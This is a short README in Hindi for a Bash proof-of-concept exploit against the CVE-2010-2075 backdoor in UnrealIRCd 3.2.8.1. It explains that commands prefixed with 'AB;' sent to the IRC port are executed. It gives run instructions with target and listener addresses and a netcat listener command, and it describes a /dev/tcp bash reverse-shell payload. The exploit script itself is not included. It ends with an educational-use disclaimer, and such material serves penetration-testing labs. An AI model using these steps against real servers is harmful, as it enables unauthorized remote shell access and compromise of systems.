
CVE-2010-2075 शोषण
UnrealIRCd 3.2.8.1 स्रोत टारबॉल में शामिल बैकडोर के लिए Bash PoC।
समझौता किया गया बाइनरी IRC पोर्ट पर भेजे गए AB; उपसर्ग वाले मनमाने कमांड को निष्पादित करता है।
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
उदाहरण:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
चलाने से पहले एक लिसनर सेट करें:
nc -lvnp 4444
बैकडोर आने वाले डेटा में AB; उपसर्ग की जाँच करता है और बाकी को सिस्टम शेल को भेजता है।
पेलोड /dev/tcp के माध्यम से एक bash रिवर्स शेल भेजता है।
केवल शैक्षिक और अधिकृत परीक्षण के लिए।